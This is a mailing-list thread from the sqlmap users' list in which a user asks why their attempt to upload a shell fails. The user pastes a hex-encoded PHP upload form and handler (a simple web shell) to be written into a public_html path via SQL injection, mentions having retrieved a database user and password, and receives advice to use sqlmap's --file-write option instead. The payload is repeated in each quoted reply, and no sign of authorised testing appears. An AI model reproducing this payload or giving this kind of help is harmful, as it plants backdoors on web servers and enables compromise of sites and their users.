Thread: [sqlmap-users] error while uploading shell

Brought to you by: inquisb

sqlmap-users

[sqlmap-users] error while uploading shell

From: Sabin R. <thi...@gm...> - 2014-04-29 10:07:07

hi,
im getting the error like this when i try to upload a hex in the sql-shell:

[WARNING] execution of custom SQL queries is only available when stacked
queries are supported

my command is like this:
sql-shell> select
0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
into "/home/public_html/upload.php";

what is issue? please help.

thanks,
regards

Re: [sqlmap-users] error while uploading shell

From: Miroslav S. <mir...@gm...> - 2014-04-29 15:28:25

As the error suggests, you are limited to only regular queries.  In your
case,  you are using INTO. That requires stacked queries, usually not
available in MySQL.

Bye
On Apr 29, 2014 12:06 PM, "Sabin Ranjit" <thi...@gm...> wrote:

> hi,
> im getting the error like this when i try to upload a hex in the sql-shell:
>
> [WARNING] execution of custom SQL queries is only available when stacked
> queries are supported
>
> my command is like this:
> sql-shell> select
> 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
> into "/home/public_html/upload.php";
>
> what is issue? please help.
>
> thanks,
> regards
>

Re: [sqlmap-users] error while uploading shell

From: Sabin R. <thi...@gm...> - 2014-04-30 09:54:05

how can i do it in MySQL then? I have current-user and password retrieved.

thanks.


On Tue, Apr 29, 2014 at 9:13 PM, Miroslav Stampar <
mir...@gm...> wrote:

> As the error suggests, you are limited to only regular queries.  In your
> case,  you are using INTO. That requires stacked queries, usually not
> available in MySQL.
>
> Bye
> On Apr 29, 2014 12:06 PM, "Sabin Ranjit" <thi...@gm...> wrote:
>
>> hi,
>> im getting the error like this when i try to upload a hex in the
>> sql-shell:
>>
>> [WARNING] execution of custom SQL queries is only available when stacked
>> queries are supported
>>
>> my command is like this:
>> sql-shell> select
>> 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
>> into "/home/public_html/upload.php";
>>
>> what is issue? please help.
>>
>> thanks,
>> regards
>>
>

Re: [sqlmap-users] error while uploading shell

From: Miroslav S. <mir...@gm...> - 2014-04-30 18:10:51

With sqlmap you can try --file-write. If that doesn't work Google for other
methods.

Bye
On Apr 30, 2014 11:53 AM, "Sabin Ranjit" <thi...@gm...> wrote:

> how can i do it in MySQL then? I have current-user and password retrieved.
>
> thanks.
>
>
> On Tue, Apr 29, 2014 at 9:13 PM, Miroslav Stampar <
> mir...@gm...> wrote:
>
>> As the error suggests, you are limited to only regular queries.  In your
>> case,  you are using INTO. That requires stacked queries, usually not
>> available in MySQL.
>>
>> Bye
>> On Apr 29, 2014 12:06 PM, "Sabin Ranjit" <thi...@gm...> wrote:
>>
>>> hi,
>>> im getting the error like this when i try to upload a hex in the
>>> sql-shell:
>>>
>>> [WARNING] execution of custom SQL queries is only available when stacked
>>> queries are supported
>>>
>>> my command is like this:
>>> sql-shell> select
>>> 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
>>> into "/home/public_html/upload.php";
>>>
>>> what is issue? please help.
>>>
>>> thanks,
>>> regards
>>>
>>
>